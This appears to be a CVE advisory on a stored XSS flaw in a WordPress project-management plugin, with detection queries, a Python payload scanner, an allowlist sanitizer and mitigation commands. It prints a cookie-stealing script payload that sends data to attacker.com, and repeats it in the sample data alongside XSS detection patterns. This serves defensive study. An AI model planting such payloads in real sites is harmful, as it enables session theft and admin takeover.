How CVE-2025-22649 Works
This stored XSS vulnerability in weDevs WP Project Manager (versions ≤2.6.22) occurs due to improper input sanitization during web page generation. Attackers inject malicious JavaScript payloads into project management fields (e.g., task descriptions). When an administrator views the compromised content, the script executes in that session, enabling cookie theft, admin account takeover, or backdoor installation. The payload persists in the database, affecting every user who opens the infected project.
DailyCVE Form
Platform: WordPress
Version: ≤2.6.22
Vulnerability: Stored XSS
Severity: Medium
Date: 04/10/2025
What Undercode Say:
Exploitation:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Insert above payload in project/task fields.
Detection:
SELECT * FROM wp_pm_meta WHERE meta_value LIKE '%<script%';
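The LIKE '%<script%' query above only catches a literal lowercase script tag; stored payloads that use mixed case, inline event handlers (onerror, onload) or javascript: URLs slip past it. The following scanner is an added example, not code from the plugin or from this page: it runs the same idea over exported rows with a small set of indicator patterns. The rows are constructed sample data standing in for `SELECT meta_id, meta_value FROM wp_pm_meta`; the column names are taken from the query on this page.

```python
import re

# Constructed sample rows standing in for the output of
#   SELECT meta_id, meta_value FROM wp_pm_meta;
# (not real data from any installation).
SAMPLE_ROWS = [
    (1, "Finish the sprint report by Friday"),
    (2, "<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>"),
    (3, '<img src=x onerror="alert(1)">'),
    (4, '<a href="javascript:alert(1)">open</a>'),
    (5, "<p>Notes: use <b>bold</b> for priorities</p>"),
    (6, "<ScRiPt>alert(1)</sCrIpT>"),
]

# Triage heuristics for stored XSS. Each one covers a vector that a plain
# LIKE '%<script%' misses: mixed-case tags, event-handler attributes,
# javascript: URLs and script-capable elements other than <script>.
XSS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE),
    "javascript_uri": re.compile(r"(href|src)\s*=\s*['\"]?\s*javascript:", re.IGNORECASE),
    "svg_or_iframe": re.compile(r"<\s*(svg|iframe|object|embed)\b", re.IGNORECASE),
}


def classify(value):
    """Return the set of indicator names that match one stored value."""
    return {name for name, pattern in XSS_PATTERNS.items() if pattern.search(value)}


def scan_rows(rows):
    """Return {meta_id: indicators} for every row matching at least one pattern.

    Rows with no hits are omitted so the result is a ready-made triage list.
    """
    findings = {}
    for meta_id, value in rows:
        hits = classify(value)
        if hits:
            findings[meta_id] = hits
    return findings


if __name__ == "__main__":
    for meta_id, hits in sorted(scan_rows(SAMPLE_ROWS).items()):
        print(f"meta_id={meta_id}: {', '.join(sorted(hits))}")
```

Treat every hit as a lead for manual review rather than proof of compromise: legitimate descriptions can contain text such as `one=` that trips the event-handler pattern, and rows 2, 3, 4 and 6 in the sample are the ones a reviewer should open first.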
Mitigation:
1. Update to patched version immediately.
2. Apply WAF rules blocking script tags. Note that the nginx rule below does not inspect requests for script tags; it denies all access to /wp-admin/, including for legitimate administrators:
location ~ /wp-admin/ { deny all; }
Sanitization Patch Example:
add_filter('pm_task_sanitization', function($content) { return wp_kses_post($content); });
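The filter above delegates to wp_kses_post, which keeps an allowlist of markup and discards everything else. To show why allowlisting is the right shape of fix (rather than blocking the string "<script>"), here is an added, stand-alone Python sanitizer in the same spirit; it is not WordPress code and is not the plugin's patch. The allowed tag and attribute sets are assumptions chosen for the example, and the only behaviour it promises is: unknown tags are dropped, unknown attributes (including every on* handler) are stripped, href values must use an http, https, mailto or relative scheme, and the contents of script and style elements are discarded outright.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist chosen for this example (an assumption, not the wp_kses_post list).
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
SAFE_SCHEMES = {"http", "https", "mailto", ""}   # "" covers relative URLs
DROP_CONTENT_TAGS = {"script", "style"}          # element AND its contents go


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the input keeping only allowlisted tags/attributes.

    Text outside dropped elements is kept but HTML-escaped, so a stored
    payload can at worst appear as visible text, never as executable markup.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skipping = False

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.skipping = True
            return
        if tag not in ALLOWED_TAGS:
            return  # tag dropped; its text still reaches handle_data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # strips onclick, onerror, style, srcdoc, ...
            value = (value or "").strip()
            if name == "href" and urlparse(value).scheme.lower() not in SAFE_SCHEMES:
                continue  # strips javascript:, data:, vbscript: links
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.skipping = False
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:
            # convert_charrefs already decoded entities, so re-escaping here
            # neutralises both raw and entity-encoded markup in the text.
            self.out.append(escape(data, quote=False))


def sanitize(html):
    """Return an allowlist-sanitized copy of an untrusted HTML fragment."""
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed samples: the payload from this page plus two common variants.
    for sample in [
        "<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>",
        '<img src=x onerror="alert(1)">',
        '<a href="javascript:alert(1)" onclick="x()">open</a>',
        "<p>Sprint notes: <b>review</b> <a href=\"https://example.com/?a=1&b=2\">spec</a></p>",
    ]:
        print(repr(sanitize(sample)))
```

The design point is that nothing here searches for the attacker's payload; the sanitizer only knows what harmless markup looks like, so new bypass variants are rejected by default instead of needing a new blocklist entry.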
Log Analysis Command:
grep -r "eval(" /var/www/html/wp-content/plugins/wedevs-project-manager/
Temporary Workaround:
Disable plugin via WP-CLI:
wp plugin deactivate wedevs-project-manager
CSRF Protection:
Add nonce verification:
if (!wp_verify_nonce($_POST['nonce'], 'pm_task_update')) { die('Invalid request'); }
Backup Affected Data:
mysqldump -u root -p wp_db wp_pm_meta > pm_backup.sql
(mysqldump takes explicit table names, not a prefix; list every wp_pm_* table you want in the backup.)
Browser Protection Header:
Add to `.htaccess`:
Header set X-XSS-Protection "1; mode=block"
(Current Chromium-based browsers and Firefox ignore this header; treat it as legacy hardening, not a fix.)
Monitoring:
tail -f /var/log/apache2/access.log | grep -E 'POST /wp-admin'
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-22649
Extra Source Hub:
Undercode